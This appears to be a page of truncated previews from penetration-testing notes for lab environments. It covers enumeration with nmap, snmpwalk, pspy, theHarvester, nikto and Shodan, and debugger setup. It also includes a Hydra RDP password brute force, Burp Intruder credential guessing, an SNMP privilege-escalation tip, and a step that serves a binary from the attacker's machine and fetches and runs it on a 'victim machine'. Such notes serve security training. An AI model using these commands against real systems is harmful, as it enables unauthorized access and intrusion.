Setting up the Immunity Debugger First open it as administrator, then attach the process from the “File” menu, select the service, and don’t forget to click on “Play”: Install mona.py Download ...
PSPY Pspy github download Monitoring Services running ./pspy64 Examples: Epsilon IP Address ifconfig -a ip address show ip a s DNS cat /etc/resolv.conf Network connections netstat -tulnpa ss ...
NMAP Multiple Vulns nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 10.11.1.7 Brute Force Hydra hydra -l pedro -P /usr/share/wordlists/rockyou.txt 10.11.1.7 rdp ...
SNMPWALK Enumerate the entire public community using SNMPv2, -t 10 to increase the timeout period to 10 seconds: snmpwalk -v 2c -c Public -t 10 10.10.11.107 snmpcheck 10.10.202.78 -c Public Exampl...
Burp Suite Intruder Since the default credentials didn’t seem to work and blank passwords aren’t allowed, let’s try to automate some basic username and password combinations with Burp Suite’s Intr...
Python3 Via web: # On our machine: python3 -m http.server 8888 # On victim machine: wget http://10.10.16.5:8888/pspy64 chmod +x pspy64 Python2 python -m SimpleHTTPServer 7331 PHP php -S 0.0....
The Harvester theHarvester -d megacorpone.com -b google The Harvester doesn’t work very well on newer versions of Kali; use the Docker image if that is the case. docker run -ti --rm thehar...
The simplest option is to set the -maxtime option, which will halt the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s Our second option is to tune the sca...
Shodan Shodan Search Engine for connected devices over the Internet. You can use various filters while using shodan, among others are: hostname port country Censys Censys Search Engine ...
SNMP Priv Escalation If port 161 is open internally, you can search for the /etc/snmp/snmpd.conf file and review its content; notice that the private community is readable and writable: rocommunity public...